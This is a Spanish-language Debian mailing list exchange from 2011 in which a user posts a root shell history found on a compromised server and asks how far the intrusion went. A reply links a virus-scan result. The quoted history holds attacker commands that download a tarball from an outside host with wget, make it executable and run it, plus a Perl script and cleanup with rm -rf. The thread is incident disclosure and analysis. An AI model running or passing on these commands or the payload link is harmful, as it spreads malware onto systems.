2011/5/13 ciracusa <cirac...@gmail.com> > Lista, buenas tardes. > > Perdón si este tema no esta directamente relacionado con Debian, pero como > el server en cuestión tiene Squeeze y es un tema de seguridad creo que puede > interesarles a mas de uno. > > Ayer viendo el history de root de un servidor veo lo siguiente: > > 314 ./go.sh 189 > 315 w > 316 cd > 317 cd /var/tmp/ > 318 rm -rf gosh > 319 ls -a > 320 exit > 321 cat /proc/cpuinfo > 322 passwd > 323 cd /var/tmp/ > 324 cd gosh > 325 touch bios.txt > 326 chmod +x * > 327 screen > 328 exit > 329 cat /proc/cpuinfo > 330 cd /var/tmp/ > 331 ls -a > 332 wget http://gblteam.webs.com/gosh.tgz.tar > 333 tar zxvf gosh.tgz.tar > 334 rm -rf gosh.tgz.tar > 335 cd gosh > 336 touch bios.txt > 337 chmod +x * > 338 ./go.sh 200 > 339 cd > 340 cd /var/tmp/ > 341 ls -a > 342 rm -rf gosh > 343 ls -a > 344 exit > 345 cd /var/tmp/ > 346 perl x.pl > > > Que opinan? > > Entiendo -lamentablemente- que el server fue comprometido, pero lo que no > llego a comprender es el alcance de esto. > > Notar que puse el link para que puedan descargarlo uds. también y > analizarlo (tomando las precauciones del caso). > > Subí el archivo del link que dejaste a un scanner online (virSCAN.org) y arrojó este resultado. http://pastebin.ubuntu.com/624760/
<http://pastebin.ubuntu.com/624760/>
